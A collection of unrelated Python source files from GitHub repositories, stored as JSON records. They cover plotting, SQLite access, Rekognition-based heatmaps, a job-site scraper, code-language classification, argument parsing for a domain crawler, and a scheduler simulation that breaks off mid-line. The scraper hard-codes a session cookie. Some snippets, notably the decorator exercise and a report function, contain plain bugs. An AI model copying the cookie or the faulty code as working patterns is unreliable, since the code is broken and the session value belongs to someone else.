marker='s')\r\n\r\n#plot the lines\r\nfor ele, con in enumerate(connectivity):\r\n for i in range(2):\r\n xs = vertices[con[i]][0], vertices[con[i+1]][0] \r\n ys = vertices[con[i]][1], vertices[con[i+1]][1]\r\n zs = vertices[con[i]][2], vertices[con[i+1]][2]\r\n line = plt3d.art3d.Line3D(xs, ys, zs)\r\n ax.add_line(line)\r\n xs = vertices[con[0]][0], vertices[con[2]][0] \r\n ys = vertices[con[0]][1], vertices[con[2]][1]\r\n zs = vertices[con[0]][2], vertices[con[2]][2]\r\n line = plt3d.art3d.Line3D(xs, ys, zs)\r\n ax.add_line(line) \r\nplt.savefig('matplotlib-fig.png')\r\n\r\nfield = np.sin(vertices[:, 0])**2 + np.sin(vertices[:, 1])**2\r\nmlab.triangular_mesh(vertices[:, 0], vertices[:, 1], vertices[:, 2], connectivity, scalars=field) #colormap='bone')\r\nmlab.savefig('./plt-maya.png', size=(600, 600))\r\nprint('[[./plt-maya.png]]')\r\n\r\nmlab.triangular_mesh(vertices[:, 0], vertices[:, 1], vertices[:, 2], connectivity, representation='wireframe')\r\nmlab.savefig('./plt-maya-wf.png', size=(600, 600))","repo_name":"dutta-alankar/surface-evolver-dump-visualization","sub_path":"surf-create.py","file_name":"surf-create.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70946507092","text":"import sqlite3\n\ndef read_var_data():\n try:\n sqlite_connection = sqlite3.connect(\"sqlite_python.db\")\n\n cursor = sqlite_connection.cursor()\n\n sqlite_select_query = \"\"\"SELECT * FROM sqlitedb_developers\"\"\"\n\n\n cursor.execute(sqlite_select_query)\n\n record = cursor.fetchall()\n\n for row in record:\n print(\"ID\", row[0])\n print(\"Name\", row[1])\n print(\"e-email\", row[2])\n print(\"data\", row[3])\n print(\"salary\", row[4], end=\"\\n\\n\\n\\n\")\n\n \n\n cursor.close()\n\n\n except sqlite3.Error as error:\n print(\"Помилка підключення до\", error)\n finally:\n if (sqlite_connection):\n sqlite_connection.close()\n print(\"Connection закрито\")\n\n\nread_var_data()","repo_name":"Oleh1kbnmkb/Semester_III","sub_path":"flask2lessons/app5.py","file_name":"app5.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26863982505","text":"\"\"\"\nThis module defines blueprints and validation rules for any HTML forms needed in our Expense application\n\"\"\"\n\n\nfrom wtforms import Form, StringField, SelectField, FloatField, DateField, validators\nfrom models import Expense, Category\n\n\nclass ExpenseForm(Form):\n name = StringField('name', [validators.Length(min=3, max=64)])\n category_id = SelectField('category_id', [validators.Length(min=24, max=24)], validate_choice=False)\n amount = FloatField('amount', [validators.NumberRange(min=0.01)])\n date = DateField('date')\n # used when editing a expense to find it from the database, ignored when making new expense\n expense_id = StringField('expense_id')\n\n\nclass CategoryForm(Form):\n name = StringField('name', [validators.Length(min=3, max=64)])\n # used when editing a category to find it from the database, ignored when making new category\n category_id = StringField('category_id')\n","repo_name":"Aberdeener/2911","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"73665497169","text":"import functools\nfrom timeit import default_timer\n\n\n\ndef measure_runtime(func):\n times = []\n\n @functools.wraps(func)\n def _runtime(*args, **kwargs):\n n = 1000\n start_time = default_timer()\n for _ in range(n):\n res = func(*args, **kwargs)\n run_time = default_timer() - start_time / n\n times.append(run_time)\n print(\"runtime:\", run_time)\n return res\n _runtime.times = times\n return _runtime\n\n\nTIME_MEASUREMENT_ON = True\n\ndef measure_runtime_parameterized(n):\n num_execs = n\n @functools.wraps(_runtime)\n def _runtime(func):\n times = []\n @functools.wraps(__runtime)\n def __runtime(*args, **kwargs):\n start_time = default_timer()\n for _ in range(num_execs):\n res = func(*args, **kwargs)\n if TIME_MEASUREMENT_ON:\n run_time = default_timer() - start_time / num_execs\n times.append(run_time)\n print(\"runtime:\", run_time)\n return res\n return __runtime\n return _runtime\n\n \n\n\n\n\n\n","repo_name":"haashah/Europython2023","sub_path":"Tutorials/Decorators_deep_dive/python_decorators/decorators/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39902670745","text":"from PIL import ImageDraw, ImageFont, Image\nfrom static import *\nfrom s3_utils import *\nfrom utils import read_json_paths\nfrom image_utils import get_median_image\nimport config\nfrom utils import json_to_human_time\n\ndef get_bounding_boxes(replies, image_height, image_width, min_confidence):\n \"\"\" Processes and flattens rekognition replies \n input:\n replies ([dict]): list of rekognition replies\n image_height (float): height of the image used to scale boxes\n image_width (float): width of the image used to scale boxes\n min_confidence (float): minimum confidence to be considered a match\n output:\n out (dict): a flat list of objects detected\n e.g.\n [{\"name\": \"person\", \"left\": 100.0, \"top\": 50.0, \"width\": 200.0, \"height\": 150.0 }, ...]\n \"\"\"\n if type(replies) is not list:\n replies = [replies]\n \n min_confidence_perc = min_confidence * 100.0\n\n out = []\n for reply in replies:\n labels = reply.get(\"Labels\", [])\n for label in labels:\n name = label.get(\"Name\")\n instances = label.get(\"Instances\", [])\n for instance in instances:\n box = instance.get(\"BoundingBox\")\n confidence = instance.get(\"Confidence\", 0)\n if box and confidence > min_confidence_perc:\n left = box['Left'] * image_width\n top = box['Top'] * image_height\n width = box['Width'] * image_width\n height = box['Height'] * image_height\n out.append({\"name\": name, \"left\": left, \"top\": top, \"width\": width, \"height\": height})\n return out\n\n\ndef draw_boxes(image, bounding_boxes, color=(255,0,0), title=None, fill_alpha=None):\n \"\"\" Returns the labels and instances with a bounding box \n \n input:\n image (PIL Image): image to be drawn over\n bounding_boxes (list): list of dictionaries to draw, containing name, left, top, width and height\n fill_alpha (int): alpha to use when filling bounding boxes\n output:\n out (list): list of objects\n \"\"\"\n if type(bounding_boxes) is not list:\n bounding_boxes = [bounding_boxes]\n \n image_width, image_height = image.size\n font_size = min(image_width, image_height) // 20\n font = ImageFont.truetype(\"fonts/calibri.ttf\", font_size)\n\n if fill_alpha:\n image = image.convert(\"RGB\")\n tmp_draw = ImageDraw.Draw(image, \"RGBA\")\n tmp_fill = (*color, fill_alpha)\n else:\n tmp_draw = ImageDraw.Draw(image)\n \n for box in bounding_boxes:\n name = box[\"name\"]\n left = box[\"left\"]\n top = box[\"top\"]\n width = box[\"width\"]\n height = box[\"height\"]\n \n if fill_alpha:\n tmp_draw.rectangle(((left, top), (left + width, top + height)), fill=tmp_fill)\n else:\n tmp_draw.rectangle([left, top, left + width, top + height], outline=color, width=2) \n tmp_draw.text((left+1, top), name, font=font, fill=\"black\")\n tmp_draw.text((left-1, top), name, font=font, fill=\"black\")\n tmp_draw.text((left, top+1), name, font=font, fill=\"black\")\n tmp_draw.text((left, top-1), name, font=font, fill=\"black\")\n tmp_draw.text((left, top), name, font=font, fill=\"white\")\n\n if title:\n left = 10\n top = 10\n tmp_draw.text((left+1, top), title, font=font, fill=\"black\")\n tmp_draw.text((left-1, top), title, font=font, fill=\"black\")\n tmp_draw.text((left, top+1), title, font=font, fill=\"black\")\n tmp_draw.text((left, top-1), title, font=font, fill=\"black\")\n tmp_draw.text((left, top), title, font=font, fill=\"white\")\n\n return image\n\ndef get_heatmap(processed_bucket, unprocessed_bucket, file_filter, object_match, min_confidence, fill_alpha):\n \"\"\" \n Returns a heatmap of an object in a group of images\n\n Inputs:\n processed_bucket (str): name of the bucket containing the processed images\n unprocessed_bucket (str): name of the bucket containing the unprocessed images\n file_filter (lambda: [str] -> [str]): filter to apply to files in a bucket\n object_match (str): object to search for\n min_confidence (float): minimum confidence to consider a match\n fill_alpha (int): amount of alpha to provide each detection\n Outputs:\n out (dictionary): representation of detections in a set of processed images\n\n \"\"\"\n processed_files = get_s3_file_names(s3_client, processed_bucket)\n unprocessed_files = get_s3_file_names(s3_client, unprocessed_bucket)\n \n processed_files_filtered = file_filter(processed_files)\n unprocessed_files_filtered = file_filter(unprocessed_files)\n\n unprocessed_paths = download_files_from_s3(\n s3_client, config.s3_unprocessed_bucket, unprocessed_files_filtered, \"/tmp/unprocessed\")\n processed_paths = download_files_from_s3(\n s3_client, config.s3_processed_bucket, processed_files_filtered, \"/tmp/processed\")\n\n image = get_median_image(unprocessed_paths)\n replies = read_json_paths(processed_paths)\n\n bounding_boxes = get_bounding_boxes(\n replies=replies, image_height=image.height, image_width=image.width, min_confidence=min_confidence)\n \n bounding_boxes_filtered = [b for b in bounding_boxes if b.get(\"name\").lower() == object_match]\n\n # TODO: determine good alpha\n out = draw_boxes(image, bounding_boxes_filtered, title=object_match, fill_alpha=fill_alpha)\n return out\n\ndef get_report(processed_bucket, file_filter, object_match, min_confidence):\n \"\"\" \n Returns a report based on a bucket containing processed files\n\n Inputs:\n processed_bucket (str): name of the bucket containing the processed images\n file_filter (lambda: [str] -> [str]): filter to apply to files in a bucket\n min_confidence (float): minimum confidence to consider a match\n Outputs:\n out (dictionary): representation of detections in a set of processed images\n\n e.g.\n\n {num_frames: 2,\n start: \"...\",\n stop: \"...\",\n objects: {\n person: {\n max: 2, \n min: 1,\n mean: 1.5,\n median: 1.5,\n frames_present: 2 \n }, \n cat: {...}\n }\n }\n \"\"\"\n processed_files = get_s3_file_names(s3_client, processed_bucket)\n processed_files_filtered = file_filter(processed_files)\n\n json_to_readable_date = lambda j: dt.datetimej.replace(\".json\", \"\")\n first = json_to_human_time(min(processed_files_filtered))\n last = json_to_human_time(max(processed_files_filtered))\n \n processed_paths = download_files_from_s3(\n s3_client, config.s3_processed_bucket, processed_files_filtered, \"/tmp/processed\")\n\n replies = read_json_paths(processed_paths)\n\n frames = []\n all_names = [object_match]\n\n for reply in replies:\n boxes = get_bounding_boxes(replies=reply, image_height=1, image_width=1, min_confidence=min_confidence) # only used to unpack\n frame = {}\n for box in boxes:\n name = box.get(\"name\").lower()\n frame[name] = frame.get(name, 0) + 1\n frames.append(frame)\n \n objects = {name: {} for name in all_names}\n num_frames = len(frames)\n\n for frame in frames: \n for name, count in frame.items():\n if name == object_match:\n cur_object = objects.get(name)\n new_max = max(cur_object.get(\"max\", -float(\"inf\")), count)\n\n new_min = min(cur_object.get(\"min\", float(\"inf\")), count)\n new_total = cur_object.get(\"total\", 0) + count\n new_frames_present = cur_object.get(\"frames_present\", 0) + 1\n \n new_object = {\"max\": new_max, \"min\": new_min, \"total\": new_total, \"frames_present\": new_frames_present}\n objects[name] = new_object\n \n objects = {key: {**val, \"mean\": val.get(\"total\", 0.0) / num_frames, \"perc_present\": val.get(\"frames_present\") / num_frames} for key, val in objects.items()}\n\n summary = {\n \"num_frames\": num_frames,\n \"first\": first,\n \"last\": last,\n \"objects\": objects\n }\n\n return summary \n","repo_name":"breeko/spypy-rekognition","sub_path":"src/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23508269456","text":"import os\nimport time\nimport requests\nimport xlwt\nimport pandas as pd\n\n\nurl = 'https://hrsspub.sz.gov.cn/ggjyfw/zyjs/l5/f14040504/notLoginQueryZpxx2.action'\nurl = 'https://hrsspub.sz.gov.cn/ggjyfw/zyjs/l5/f14040504/notLoginQueryZpxx2.action'\njob_url = 'https://hrsspub.sz.gov.cn/ggjyfw/pages/homePageSkip/zpgw.jsp?aab001={0}&ccz004={1}&ccb002={2}'\nheader = {\n 'Host': 'hrsspub.sz.gov.cn',\n 'Referer': 'https://hrsspub.sz.gov.cn/ggjyfw/pages/homePageSkip/dwzpMore.jsp',\n 'Cookie': 'pgv_pvid=3516056684; _trs_uv=kv3x8k0e_914_6zg0; UM_distinctid=17cbcea201f54f-0b7dffa445552-57b193e-100200-17cbcea2020383; CNZZDATA1254585771=911925943-1635255043-null%7C1635255043; JSESSIONID=KQ69PbVCzJOgvsPQBXFd1SR5mk2M8FiiLJVxrS9yLEuKTJruvmW5!-294269610',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0'\n}\ndata = {\n \"limit\": \"10\"\n}\nnames = (('05', '专场招聘', 7), ('01', '委托招聘', 261), ('03', '网络招聘', 254),\n ('04', '现场招聘', 123))\nworkbook = xlwt.Workbook(encoding='utf-8')\n\ndef sava_data(job_List, name, count=0):\n worksheet = workbook.add_sheet(name)\n titles = ['序号', '单位名称', '招聘岗位', '招聘网址']\n for index, title in enumerate(titles):\n worksheet.write(0, index, title)\n for index, info in enumerate(job_List):\n for m in info['cb02DTOs']:\n count += 1\n worksheet.write(count, 0, count)\n worksheet.write(count, 1, info['aab004'])\n worksheet.write(count, 2, m['cac020'])\n worksheet.write(count, 3, job_url.format(info['aab001'], m['ccz004'], m['ccb002']))\n if not os.path.exists('szjob/excel/'):\n os.mkdir('szjob/excel/')\n workbook.save('szjob/excel/岗位.xlsx')\n\n\ndef get_data():\n for name in names:\n data[\"ccb002in\"] = name[0]\n data[\"start\"] = '1'\n res = requests.post(url, headers=header, params=data)\n print(res.url)\n df_res = pd.DataFrame(res.json())\n job = df_res['result'][0]['companyDTOs']\n for i in range(10, name[2], 10):\n data[\"start\"] = str(i)\n response = requests.post(url, headers=header, params=data)\n print(response.url)\n df_response = pd.DataFrame(response.json())\n job += df_response['result'][0]['companyDTOs']\n time.sleep(3)\n sava_data(job, name[1])\n\n\nif __name__ == \"__main__\":\n get_data()\n","repo_name":"Jliucheng/pythonproject","sub_path":"szjob/getInfo.py","file_name":"getInfo.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"31068301939","text":"import re\nimport os\nimport collections\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport sys\n\n# some global vars that are used by the functions, can be easily changed\nnum_tokens_per_lang = 40\nnum_tokens_to_show = 20\n\n# path_curr = os.path.dirname(__file__) # pathname of this module\n# path_repos = os.path.join(path_curr, path_repos)\n\npath_df_train = 'processed_data/df_train.csv'\npath_df_valid = 'processed_data/df_valid.csv'\npath_df_test = 'processed_data/df_test.csv'\npath_repos = './code-repos'\npath_dir_for_processed_data = './processed_data/'\npath_file_list_full = path_dir_for_processed_data + 'file_list_full.csv'\npath_file_list_subset = path_dir_for_processed_data + 'file_list_subset.csv'\npath_file_list_train = path_dir_for_processed_data + 'file_list_train.csv'\npath_file_list_valid = path_dir_for_processed_data + 'file_list_valid.csv'\npath_file_list_test = path_dir_for_processed_data + 'file_list_test.csv'\npath_top_tokens_per_lang = path_dir_for_processed_data + 'top_tokens_per_lang.csv'\n\n# desired_file_extensions = ['.html', '.java', '.py', '.c', '.cpp', '.rb', '.php']\n# counter_html = collections.Counter()\n# counter_java = collections.Counter()\n# counter_py = collections.Counter()\n# counter_c = collections.Counter()\n# counter_cpp = collections.Counter()\n# counter_rb = collections.Counter()\n# counter_php = collections.Counter()\n# num_files = {'.html': 0, '.java': 0, '.py': 0, '.c': 0, '.cpp': 0, '.rb': 0, '.php': 0}\n# top_tokens = {'.html': [], '.java': [], '.py': [], '.c': [], '.cpp': [], '.rb': [], '.php': [], 'all': []}\n\nlang_exts_with_dot = [] # will be set by preprocess_repos(), the entry function for this module\nnum_files = {}\ntop_tokens = {'all': []}\nlang_counters = {}\n\n\n# if __name__ == \"__main__\":\ndef preprocess_repos(langs_extension):\n setup_global_vars(langs_extension)\n # print_global_vars()\n generate_file_lists()\n build_token_dicts()\n build_dataset()\n\ndef setup_global_vars(langs_extension):\n global lang_exts_with_dot\n lang_exts_with_dot = [f'.{x}' for x in langs_extension]\n for lang_ext in lang_exts_with_dot:\n num_files[lang_ext] = 0\n top_tokens[lang_ext] = []\n lang_counters[lang_ext] = collections.Counter()\n\n# def print_global_vars():\n# print(lang_exts_with_dot)\n# print(num_files)\n# print(top_tokens)\n# print(lang_counters)\n\n\ndef generate_file_lists():\n file_list_full = []\n labels_full = []\n for root, subdir, files in os.walk(path_repos):\n for file in files:\n ext = os.path.splitext(file)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n num_files[ext] += 1\n filepath = os.path.join(root, file)\n file_list_full.append(filepath)\n labels_full.append(ext)\n\n df_file_list_full = pd.DataFrame()\n df_file_list_full['filepaths'] = file_list_full\n df_file_list_full['label'] = labels_full\n df_file_list_full.to_csv(path_file_list_full)\n\n num_files_per_lang = min(num_files.values()) // 100 * 100 # round down to next 100\n # num_files_per_lang = min(2000, num_files_per_lang) # do not use more than 2000\n df_file_list_subset = df_file_list_full.groupby('label').sample(num_files_per_lang)\n df_file_list_subset.to_csv(path_file_list_subset)\n \n # df_file_list_train = pd.DataFrame()\n # df_file_list_valid = pd.DataFrame()\n # df_file_list_test = pd.DataFrame()\n\n # produces a 60%, 20%, 20% split for training, validation and test sets\n # df_file_list_train['filepaths'], df_file_list_valid['filepaths'], df_file_list_test['filepaths'] = np.split(df_file_list_full['filepaths'].sample(frac=1), [int(.6*len(df_file_list_full['filepaths'])), int(.8*len(df_file_list_full['filepaths']))])\n\n df_file_list_train, df_file_list_test = train_test_split(df_file_list_subset, test_size=0.2, random_state=42)\n df_file_list_train, df_file_list_valid = train_test_split(df_file_list_train, test_size=0.25, random_state=42)\n\n df_file_list_train.to_csv(path_file_list_train)\n df_file_list_valid.to_csv(path_file_list_valid)\n df_file_list_test.to_csv(path_file_list_test)\n\n # print(df_file_list_full['label'].value_counts())\n # print(df_file_list_subset['label'].value_counts())\n # print(df_file_list_train['label'].value_counts())\n # print(df_file_list_valid['label'].value_counts())\n # print(df_file_list_test['label'].value_counts())\n\ndef tokenize(text):\n # split by non-word characters, keep the matched pattern/delimiters\n tokens = re.split('(\\W)', text)\n tokens = [x for x in tokens if (x != None and x.strip() != \"\")]\n return tokens\n\ndef tokenize_file(filepath):\n f = open(filepath, 'rb')\n text = f.read().decode(errors='replace')\n return tokenize(text)\n\ndef build_token_dicts(dir_search='./code-repos'):\n df = pd.read_csv(path_file_list_train)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n file_count = 0\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n try:\n tokens = tokenize_file(filepath)\n except:\n continue\n \n lang_counters[ext].update(tokens)\n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building token dict: [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n\n print(\"\\n\")\n\n df = pd.DataFrame()\n for lang, counter in lang_counters.items():\n print(\"Files with extension {%s}: %d\" % (lang, num_files[lang]))\n df[lang] = [token for (token, count) in counter.most_common(num_tokens_per_lang)]\n \n df.to_csv(path_top_tokens_per_lang)\n print(\"\\nThese are the top %d tokens for the %d languages\" % (num_tokens_to_show, len(lang_exts_with_dot)))\n print(df.head(n=num_tokens_to_show))\n print()\n\ndef vectorize(tokens):\n num_tokens = len(tokens)\n\n counter = collections.Counter(tokens)\n vector = [counter[token] for token in top_tokens['all']]\n return vector\n\ndef vectorize_file(filepath):\n tokens = tokenize_file(filepath)\n return vectorize(tokens)\n\ndef populate_top_tokens():\n global top_tokens\n \n df_top_tokens = pd.read_csv(path_top_tokens_per_lang)\n for x in lang_exts_with_dot:\n top_tokens[x] = list(df_top_tokens[x])\n top_tokens['all'] += top_tokens[x]\n\n # remove duplicated tokens from top_tokens['all']\n top_tokens['all'] = list(set(top_tokens['all']))\n\ndef build_dataset():\n populate_top_tokens()\n \n num_features = len(top_tokens['all'])\n\n df_train = pd.DataFrame()\n X_train = np.empty((0, num_features), dtype=np.uint32)\n y_train = []\n\n df_valid = pd.DataFrame()\n X_valid = np.empty((0, num_features), dtype=np.uint32)\n y_valid = []\n\n df_test = pd.DataFrame()\n X_test = np.empty((0, num_features), dtype=np.uint32)\n y_test = []\n\n file_count = 0\n df = pd.read_csv(path_file_list_train)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n\n try:\n vector = vectorize_file(filepath)\n except:\n continue\n y_train.append(ext)\n X_train = np.vstack((X_train, vector))\n \n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building df_train: [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n\n print()\n\n df_train = pd.DataFrame(\n data=X_train,\n columns=top_tokens['all']\n )\n df_train['label'] = y_train\n df_train.to_csv(path_df_train, index=False)\n\n file_count = 0\n df = pd.read_csv(path_file_list_valid)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n\n try:\n vector = vectorize_file(filepath)\n except:\n continue\n y_valid.append(ext)\n X_valid = np.vstack((X_valid, vector))\n\n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building df_valid: [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n\n print()\n\n df_valid = pd.DataFrame(\n data=X_valid,\n columns=top_tokens['all']\n )\n df_valid['label'] = y_valid\n df_valid.to_csv(path_df_valid, index=False)\n\n file_count = 0\n df = pd.read_csv(path_file_list_test)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n\n try:\n vector = vectorize_file(filepath)\n except:\n continue\n y_test.append(ext)\n X_test = np.vstack((X_test, vector))\n \n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building df_test : [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n \n print(\"\\n\")\n\n df_test = pd.DataFrame(\n data=X_test,\n columns=top_tokens['all']\n )\n df_test['label'] = y_test\n df_test.to_csv(path_df_test, index=False)\n\n print(\"df_train.csv:\")\n print(df_train['label'].value_counts())\n print()\n print(\"df_valid.csv:\")\n print(df_valid['label'].value_counts())\n print()\n print(\"df_test.csv:\")\n print(df_test['label'].value_counts())\n","repo_name":"awwkl/github-DAP","sub_path":"dataframe-building/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14818367022","text":"\"\"\"\nThis module contains a logger object that can be used to log messages to a file and the console.\nYou can edit the .setLevel() method to change the level of the messages that are logged.\n\"\"\"\n\nimport logging\nimport argparse\nfrom multiprocessing import cpu_count\n\n\n# Class to customize the help message format\nclass CustomHelpFormatter(argparse.HelpFormatter):\n\t\"\"\"\n\tFormats the help message to display the arguments in a more readable format\n\t\"\"\"\n\n\tdef _format_action_invocation(self, action):\n\t\t\"\"\"\n\t\tFormats the arguments in the help message\n\t\tArgs:\n\t\t\taction (argparse.Action): Action object containing the arguments\n\t\tReturns:\n\t\t\tFormatted string containing the arguments\n\t\t\"\"\"\n\t\tif not action.option_strings:\n\t\t\tmetavar, = self._metavar_formatter(action, action.dest)(1)\n\t\t\treturn metavar\n\t\telse:\n\t\t\tparts = []\n\n\t\t\t# If the Optional doesn't take a value, format is `-s, --long`\n\t\t\tif action.nargs == 0:\n\t\t\t\tparts.extend(action.option_strings)\n\n\t\t\t# If the Optional takes a value, format is `-s ARGS, --long ARGS`\n\t\t\telse:\n\t\t\t\tdefault = action.dest.upper()\n\t\t\t\targs_string = self._format_args(action, default)\n\t\t\t\tfor option_string in action.option_strings:\n\t\t\t\t\tparts.append(f'{option_string} {args_string}')\n\n\t\t\treturn ', '.join(parts)\n\n\tdef _format_action(self, action):\n\t\t\"\"\"\n\t\tFormats the help message for each argument\n\t\tArgs:\n\t\t\taction (argparse.Action): Action object containing the arguments\n\t\tReturns:\n\t\t\tformatted_help (str): Formatted string containing the help message for each argument\n\t\t\"\"\"\n\t\thelp_text = self._expand_help(action)\n\t\taction_header = self._format_action_invocation(action)\n\n\t\t# Left-justify action header strings with padding\n\t\taction_header = action_header.ljust(self._action_max_length)\n\n\t\t# Create the formatted help string without a line break between the action and help text\n\t\tformatted_help = f'{action_header} {help_text}\\n'\n\n\t\treturn formatted_help\n\n\ndef createLogger():\n\t\"\"\"\n\tCreates a logger object that can be used to log messages to a file and the console\n\tReturns:\n\t\tlogger (logging.Logger): Logger object\n\t\"\"\"\n\t# Create a formatter to format the log messages\n\tformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\t# Create a logger object\n\tlogger = logging.getLogger('output')\n\tlogger.setLevel(logging.DEBUG)\n\n\t# Clear any existing handlers in the logger\n\tif logger.hasHandlers():\n\t\tlogger.handlers.clear()\n\t# Create a file handler that writes log messages to a file\n\n\tfile_handler = logging.FileHandler('output.log')\n\tfile_handler.setLevel(logging.DEBUG)\n\tfile_handler.setFormatter(formatter)\n\tlogger.addHandler(file_handler)\n\treturn logger\n\n\n# Get CLI arguments\ndef parseArguments():\n\t\"\"\"\n\tParses the arguments passed to the script\n\tReturns:\n\t\targuments (argparse.Namespace): Namespace object containing the arguments\n\n\t\"\"\"\n\tthreads = cpu_count() - 2 if cpu_count() > 4 else 1\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"Simple script to crawl a domain for subdomains and directories\",\n\t\tformatter_class=CustomHelpFormatter,\n\t\tadd_help=False\n\t)\n\n\t# Help argument\n\tparser.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit\")\n\n\t# Required argument: domain\n\tparser.add_argument(\"domain\", help=\"Specify a domain\")\n\n\t# Optional argument: output_dir\n\tparser.add_argument(\"-o\", \"--output_dir\", help=\"Specify the output directory\", default=\"output_files\")\n\n\t# Optional argument: threads\n\tparser.add_argument(\"-t\", \"--threads\",\n\t type=int, default=threads,\n\t help=f\"Specify the number of threads to use, (default: {threads})\")\n\n\t# Optional argument: username\n\tparser.add_argument(\"-u\", \"--username\", help=\"Specify the username\")\n\n\t# Optional argument: password_file\n\tparser.add_argument(\"-p\", \"--password_file\", help=\"Specify the password file\")\n\n\t# Store arguments inside args object and return it\n\targuments = parser.parse_args()\n\treturn arguments\n","repo_name":"ElioaChukri/domain_crawler","sub_path":"accessories.py","file_name":"accessories.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42469129812","text":"#!/usr/bin/env python3\n\nimport json\nfrom copy import copy\nimport heapq\nimport gevent.pool\nfrom gevent.lock import BoundedSemaphore\nfrom timeit import default_timer as timer\nfrom math import ceil\nimport os.path\nfrom random import gauss\nfrom tqdm import tqdm\n\n\nclass Task(object):\n def __init__(self, tid, runtime, resources, planned_st, machine):\n self.tid = tid\n self.runtime = runtime\n self.resources = resources\n self.resources[0] = int(self.resources[0] * 1000)\n self.planned_st = planned_st\n self.machine = machine\n self.succs = []\n self.outputs = []\n self.remaining_prevs = 0\n\n def execute(self):\n gevent.sleep(self.runtime)\n\n def __repr__(self):\n return \"Task<{}>[{}s]\".format(self.tid, self.runtime)\n\n\nclass Comm(object):\n def __init__(self, from_task, to_task, data_size, planned_st, planned_ft):\n self.from_task = from_task\n self.to_task = to_task\n self.data_size = data_size\n self.planned_st = planned_st\n self.planned_ft = planned_ft\n\n def execute(self):\n rate = 125829120\n gevent.sleep(ceil(self.data_size / rate))\n\n def suspend(self):\n pass\n\n def resume(self):\n pass\n\n def __repr__(self):\n return \"COMM<{}=>{}>\".format(self.from_task.tid, self.to_task.tid)\n\n\nclass Machine(object):\n def __init__(self, capacities):\n self.remaining_resources = copy(capacities)\n self.remaining_resources[0] = (self.remaining_resources[0] * 1000)\n self.suspended_sending = []\n self.suspended_receiving = []\n self.current_receiving = None\n self.current_sending = None\n self.sending_lock = BoundedSemaphore(1)\n self.receiving_lock = BoundedSemaphore(1)\n\n def add_sending_comm(self, comm):\n self.sending_lock.acquire()\n if self.current_sending:\n self.current_sending.suspend()\n self.suspended_sending.append(self.current_sending)\n self.current_sending = comm\n self.sending_lock.release()\n\n def finish_sending_comm(self):\n self.sending_lock.acquire()\n if self.suspended_sending:\n self.current_sending = self.suspended_sending.pop()\n self.current_sending.resume()\n else:\n self.current_sending = None\n self.sending_lock.release()\n\n def add_receiving_comm(self, comm):\n self.receiving_lock.acquire()\n if self.current_receiving:\n self.suspended_receiving.append(self.current_receiving)\n self.current_receiving.suspend()\n self.current_receiving = comm\n self.receiving_lock.release()\n\n def finish_receiving_comm(self):\n self.receiving_lock.acquire()\n if self.suspended_receiving:\n self.current_receiving = self.suspended_receiving.pop()\n self.current_receiving.resume()\n else:\n self.current_receiving = None\n self.receiving_lock.release()\n\n def remove_resources(self, resources):\n self.remaining_resources[0] -= resources[0]\n self.remaining_resources[1] -= resources[1]\n\n def add_resources(self, resources):\n self.remaining_resources[0] += resources[0]\n self.remaining_resources[1] += resources[1]\n\n\nclass Scheduler(object):\n task_cls = Task\n comm_cls = Comm\n\n def __init__(self, allow_share=False, allow_preemptive=False):\n self.allow_share = allow_share\n self.allow_preemptive = not allow_share and allow_preemptive\n self.log = False\n\n def load(self, path):\n self.alg_name = os.path.basename(path)[:-9]\n with open(path) as f:\n raw_schedule = json.load(f)\n self.num_tasks = raw_schedule[\"num_tasks\"]\n num_machines = len(raw_schedule[\"machines\"])\n capacities = 